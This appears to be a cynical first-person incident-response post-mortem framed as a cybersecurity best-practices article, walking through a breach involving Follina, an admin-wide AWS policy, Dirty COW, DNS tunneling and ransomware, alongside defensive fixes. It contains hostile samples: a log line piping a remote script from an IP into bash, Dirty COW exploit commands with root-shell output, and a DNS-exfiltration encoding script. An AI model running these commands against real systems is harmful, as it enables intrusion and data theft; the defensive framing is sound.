# 10 Essential Cybersecurity Best Practices to Stay Safe

```text
May 14 03:12:04 web-prod-01 sshd[29481]: Invalid user admin from 193.161.193.193 port 54228
May 14 03:12:06 web-prod-01 sshd[29483]: Invalid user support from 193.161.193.193 port 54230
May 14 03:12:09 web-prod-01 sshd[29485]: Accepted password for jdoe from 193.161.193.193 port 54232 ssh2
May 14 03:12:09 web-prod-01 systemd-logind[652]: New session 482 of user jdoe.
May 14 03:12:10 web-prod-01 sudo: jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; COMMAND=/usr/bin/apt-get update
May 14 03:13:45 web-prod-01 sudo: jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; COMMAND=/bin/bash
May 14 03:14:12 web-prod-01 bash[29501]: curl -s http://91.210.226.128/p.sh | bash
```

I’ve been in this room so long I’ve forgotten what sunlight feels like. My eyes are vibrating. The air conditioning is humming a low, mocking tune, and the trash can is overflowing with empty espresso pods and those "Security Awareness" posters I tore off the wall because they make me want to vomit. You know the ones. The "Think Before You Click" garbage with the cartoon padlock. 

The industry is a joke. We pretend we’re building fortresses, but we’re actually just stacking wet cardboard and praying it doesn’t rain. I just finished the forensic image of the primary database server. It’s gone. Everything is gone. Not because of some nation-state "Advanced Persistent Threat" with zero-days from the future, but because of the same rotting, systemic incompetence that’s been eating this field alive for twenty years.

## EVIDENCE FILE #1: THE FALLACY OF THE HUMAN FIREWALL

It started with Kevin. Kevin is a junior analyst in accounting. Kevin was tired. He’d been working ten-hour shifts because the "Efficiency Experts" decided the department was overstaffed. When he got an email at 4:45 PM on a Friday titled "Q3 Bonus Structure - Confidential.pdf.exe," he didn't look at the extension. He didn't check the headers. He clicked.

The "Human Firewall" is a lie sold by marketing drones to shift the blame from shitty architecture to underpaid employees. We tell people to be the first line of defense while giving them tools that are basically open windows. Kevin's machine was running an unpatched build of Windows 10, specifically missing the updates for CVE-2022-30190 (Follina). The payload didn't even need a macro. The dropper opened a decoy document whose remote template pulled a malicious HTML file, which abused the Microsoft Support Diagnostic Tool (MSDT) via the ms-msdt: URI handler to execute PowerShell.

The actual best practice would have been a hardened endpoint configuration that disables the MSDT URL protocol via the registry and enforces strict execution policies. Instead, the "suits" worried that disabling features might "hinder productivity." So, Kevin clicked, the shell opened, and the adversary had a toehold. They didn't need a heap spray. They didn't need to bypass ASLR. They just needed a tired human and a default configuration.
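For the record, Microsoft's published workaround at the time was a two-line registry change: export the ms-msdt protocol handler as a backup, then delete it (run from an elevated prompt, and restore from the .reg file once the actual patch lands):

```text
reg export HKCR\ms-msdt msdt-backup.reg
reg delete HKCR\ms-msdt /f
```

Two lines. Nobody ran them.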

## EVIDENCE FILE #2: THE IAM IDENTITY CRISIS IN THE CLOUD

Once they were in Kevin’s workstation, they didn't go for the local files. They went for the environment variables. Kevin had been "helping" the DevOps team with some AWS automation—don't ask me why an accountant had CLI access, that’s a different circle of hell. 

I found a `.aws/credentials` file on his machine with full `AdministratorAccess` permissions. This is where "best practices" go to die. We talk about the Principle of Least Privilege (PoLP) in every board meeting, but in the trenches, it's always "just give it 'Full Access' so it works, we'll tighten it later." Later never comes.

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}
```

That’s the policy I found attached to the user. It’s a suicide note. The attacker used these credentials to pivot into the production VPC. They didn’t have to crack a single password. They just called `aws sts get-caller-identity` and realized they owned the kingdom. They started spinning up EC2 instances in us-west-2 (a region the company doesn’t even use) to begin the exfiltration process. They bypassed the “Human Firewall” and walked right through the “Identity Firewall” because the identity was a god-king with no oversight.
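What that user actually needed — judging from the sync scripts I found on the machine — was probably nothing more than scoped S3 access. Something like the following (the bucket name is hypothetical; this is a sketch of least privilege, not the policy they should ship verbatim), which would have made the stolen keys nearly worthless:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:PutObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::example-finance-reports",
                "arn:aws:s3:::example-finance-reports/*"
            ]
        }
    ]
}
```

With that attached, `aws sts get-caller-identity` still answers, but the pivot into the production VPC dies on the first `AccessDenied`.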

## EVIDENCE FILE #3: THE GHOST IN THE LEGACY MACHINE

This is where it gets truly pathetic. The attackers moved laterally from the AWS environment back into the on-premise data center via a site-to-site VPN that had no internal segmentation. They found a server named billing-legacy-01.

This box was running Debian 7 (Wheezy). For those of you keeping track, Wheezy went End-of-Life in 2018. It was running Kernel 3.2.0. The “uptime” cult had kept this machine running for 1,400 days without a reboot because the proprietary billing software written in 2004 would “break” if the kernel was updated.

The attacker used CVE-2016-5195—Dirty COW. It’s a classic race condition in the way the Linux kernel’s memory subsystem handled copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

```text
# Running the exploit on billing-legacy-01
$ gcc -pthread dirty.c -o dirty -lcrypt
$ ./dirty password123
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete! Binary patch applied.
$ su root
Password: password123
root@billing-legacy-01:/# whoami
root
```

They had root on the core billing database in under thirty seconds. The right move here is obvious: decommission legacy systems or, at the very least, isolate them in a VLAN with zero egress/ingress except for specific, proxied ports. But no. “Uptime is king,” the CTO said. Well, the king is dead, and the crown is being sold on a darknet forum for 2.5 Bitcoin.
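Isolation isn't exotic, either. Even a host-level default-deny on the box itself would have contained this. A sketch with placeholder addresses, assuming the legacy billing app only ever needed to serve MySQL to a single application server:

```shell
# Default-deny on billing-legacy-01 (IPs are placeholders for illustration).
# Loopback stays open; the only other permitted traffic is the app server
# reaching the MySQL port. Everything else -- including outbound curl to a
# payload server -- silently dies.
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -A INPUT  -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT  -s 10.0.1.10 -p tcp --dport 3306 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -d 10.0.1.10 -p tcp --sport 3306 -m state --state ESTABLISHED -j ACCEPT
```

Six rules. The box had zero.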

## EVIDENCE FILE #4: EXFILTRATION VIA DNS TUNNELING

By the time I got the call, the data was already halfway across the world. The attackers knew we were monitoring outbound HTTPS traffic. They knew we had a fancy “Next-Gen Firewall” that looks for large file transfers. So, they didn’t use HTTPS. They used DNS tunneling.

They broke the 40GB customer database into tiny, base64-encoded chunks and sent them out as DNS queries for subdomains of a domain they controlled. To the firewall, it just looked like a high volume of DNS lookups.
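The mechanics are trivial. Here is a toy sketch of the encoding step — nothing from the attacker's actual tooling, and the chunk size, file, and domain are invented — just to show how file chunks become query names:

```shell
# Toy illustration of DNS-tunnel encoding (not the attacker's tooling).
# Split a "stolen" file into small chunks, base64url-encode each chunk,
# and print one DNS query name per chunk. A real tunnel adds sequence
# numbers so the receiver can reassemble out-of-order queries; this only
# shows the shape of the traffic.
printf 'this is a test of the emergency broadcast system.' > /tmp/loot.bin
split -b 16 /tmp/loot.bin /tmp/exfil_chunk_
for c in /tmp/exfil_chunk_*; do
  # 16 raw bytes -> 24 base64 chars, comfortably under the 63-byte DNS label limit
  label=$(base64 "$c" | tr -d '\n=' | tr '+/' '-_')
  echo "${label}.attacker-domain.com"
done
```

Each printed line is a perfectly ordinary-looking A-record lookup. Replay the chunks on the authoritative server for `attacker-domain.com` and the file walks out one query at a time.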

```text
# tcpdump -i eth0 -n port 53
04:22:10.123456 IP 10.0.1.45.5321 > 8.8.8.8.53: 54321+ A? dGhpcyBpcyBhIHRlc3Q.attacker-domain.com.
04:22:10.124567 IP 10.0.1.45.5322 > 8.8.8.8.53: 54322+ A? b2YgdGhlIGVtZXJnZW5jeS4.attacker-domain.com.
04:22:10.125678 IP 10.0.1.45.5323 > 8.8.8.8.53: 54323+ A? YnJvYWRjYXN0IHN5c3RlbS4.attacker-domain.com.
```

Best practice here involves DNS filtering and inspection, or at the very least rate-limiting DNS queries from internal hosts. But the network team complained that DNS inspection “added latency” to the web browsing experience of the marketing team. So, they turned it off. They traded the entire customer database for a 20ms decrease in page load times for Facebook.
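Even a crude frequency check would have caught it. A sketch — the flattened log format, the fourth query, and the threshold are all invented for illustration — but counting lookups per source under each registered domain and alerting on outliers is the core of most DNS-tunnel detection:

```shell
# Hypothetical flattened query log: "<source-ip> <query-name>" per line.
cat > /tmp/dns.log <<'EOF'
10.0.1.45 dGhpcyBpcyBhIHRlc3Q.attacker-domain.com
10.0.1.45 b2YgdGhlIGVtZXJnZW5jeS4.attacker-domain.com
10.0.1.45 YnJvYWRjYXN0IHN5c3RlbS4.attacker-domain.com
10.0.1.45 c29tZXRoaW5nIGVsc2U.attacker-domain.com
10.0.2.10 www.example.com
EOF

# Group queries by (source host, registered domain) and flag anything past
# a toy threshold. Real detectors also score label entropy and length.
awk '{
  n = split($2, parts, ".")
  domain = parts[n-1] "." parts[n]   # crude "registered domain" heuristic
  count[$1 " " domain]++
}
END {
  for (k in count)
    if (count[k] > 3) print "ALERT " k " (" count[k] " queries)"
}' /tmp/dns.log
```

One noisy host, one suspicious domain, one alert line. That is the entire detection the $200k SIEM failed to produce.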

The kernel’s OOM (out-of-memory) killer started nuking legitimate processes because the exfiltration script was poorly written and leaking memory like a sieve. That was the only reason anyone noticed. Not the “AI-driven” SOC alerts. Not the $200k SIEM. The server started dying because it couldn’t breathe.

## EVIDENCE FILE #5: THE BACKUP MIRAGE

“Don’t worry,” the VP of IT said while I was still staring at the encrypted file headers. “We have cloud backups. We’ll just roll back.”

I almost laughed. I would have if I wasn’t so dehydrated.

Their “backups” weren’t backups. They were a real-time sync to an S3 bucket. The ransomware—a variant of LockBit 3.0—didn’t just encrypt the local files. It used those same “AdministratorAccess” AWS keys we found on Kevin’s machine to find the S3 bucket and encrypt the objects there too.

They had no versioning enabled. They had no Object Lock (WORM – Write Once Read Many). They had no cold-storage, air-gapped backups. They had a “synced” copy of their own destruction.

Actual best practice requires the 3-2-1 rule: three copies of data, on two different media, with one copy off-site and offline. In the era of cloud, “offline” means an immutable vault with a different set of credentials and MFA that isn’t tied to the main corporate SSO. But that costs an extra $400 a month in storage fees and “complicates” the recovery workflow.
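For the record, the controls they skipped are a handful of CLI calls. A hedged sketch — the bucket names, region, and retention period are placeholders, and note that Object Lock can only be switched on when a bucket is created, which is exactly why nobody retrofits it:

```shell
# Turn on versioning for an existing backup bucket, so a ransomware
# overwrite creates a new version instead of destroying the only copy.
aws s3api put-bucket-versioning \
    --bucket example-backup-bucket \
    --versioning-configuration Status=Enabled

# Object Lock (WORM) must be enabled at bucket creation time.
aws s3api create-bucket \
    --bucket example-backup-vault \
    --object-lock-enabled-for-bucket \
    --create-bucket-configuration LocationConstraint=us-east-2

# Default retention: nothing in the vault can be overwritten or deleted
# for 30 days -- not even by the account that wrote it.
aws s3api put-object-lock-configuration \
    --bucket example-backup-vault \
    --object-lock-configuration \
        'ObjectLockEnabled=Enabled,Rule={DefaultRetention={Mode=COMPLIANCE,Days=30}}'
```

With compliance-mode retention in place, Kevin’s stolen `AdministratorAccess` keys could have encrypted the live bucket all day long; the vault copies would still have been sitting there, untouchable, at restore time.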

So, they sat there, staring at a “Restore Failed” message, while I dug through the logs to find the exact moment their history was deleted.

## EVIDENCE FILE #6: THE CULT OF UPTIME AND TECHNICAL DEBT

Why was a Debian 7 box still running? Why was Kevin’s machine unpatched? Why were the IAM roles so permissive?

It’s the Cult of Uptime. In every post-mortem I’ve written for the last decade, the root cause is never a technical failure; it’s a cultural one. We have built a world where “working” is more important than “secure.”

I looked at the crontab on the compromised billing server. It was a mess of “temporary” fixes that had been there for six years.

```text
# m h  dom mon dow   command
@reboot /root/fix_db_permissions.sh # Added by Mike in 2017 - DO NOT REMOVE
*/5 * * * * /usr/bin/python /home/admin/sync_script.py >> /var/log/sync.log 2>&1
# 0 0 * * * /usr/bin/apt-get upgrade # Disabled because it broke the legacy app
```

The `apt-get upgrade` line was commented out. Someone—probably Mike, who left the company in 2019—decided that the risk of a broken app was higher than the risk of a total system compromise. This is the technical debt that we’re all drowning in. We’re running the global economy on unpatched, EOL software because we’re too afraid to spend the money to refactor it.

The only viable strategy is to treat technical debt like a high-interest loan. You pay it down or it ruins you. But the C-suite doesn’t see technical debt on the balance sheet. They see “cost centers” (Security) and “revenue generators” (Features).

I found the Log4j vulnerability (CVE-2021-44228) on three other internal servers during my sweep. They’d “patched” it by setting the `log4j2.formatMsgNoLookups` property to `true` but hadn’t actually updated the library. The attackers didn’t even use it this time, but it was there, waiting like a landmine for the next script kiddie to wander by.

## THE AFTERMATH

I’m looking at the final netstat output before the system was taken offline. It’s a graveyard.

```text
# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      842/sshd            
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1021/mysqld         
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      29501/metasploit    
udp        0      0 0.0.0.0:53              0.0.0.0:*                           913/dnsmasq         
```

See that? Port 4444. A default Metasploit listener. They didn’t even bother to change the port. They were so confident in the lack of monitoring that they just left the front door open and put a “Welcome” mat out.

I’m done here. I’m going to go home, take a shower to get the smell of stale coffee and failure off my skin, and wait for the next call. It’ll come. Maybe not today, maybe not next week, but it’ll come. Because as long as we prioritize “uptime” over “integrity,” and as long as we keep believing the “Human Firewall” lie, I’ll always have work.

The suits are currently drafting a press release. They’ll use words like “sophisticated,” “unprecedented,” and “resilient.” They’ll tell the customers that “security is our top priority.”

It’s all lies. Security wasn’t even in the top ten. If it were, I wouldn’t be sitting in a dark room at 4 AM looking at a Dirty COW exploit on a server that should have been in a museum.

The next one is already happening. Somewhere, another Kevin is clicking a link, another admin is granting * permissions to a “test” account, and another legacy box is ticking like a time bomb.

Good luck. You’re going to need it. Or better yet, just start backing up your data to something that isn’t connected to the internet. But you won’t. It’s too much of a hassle, right?
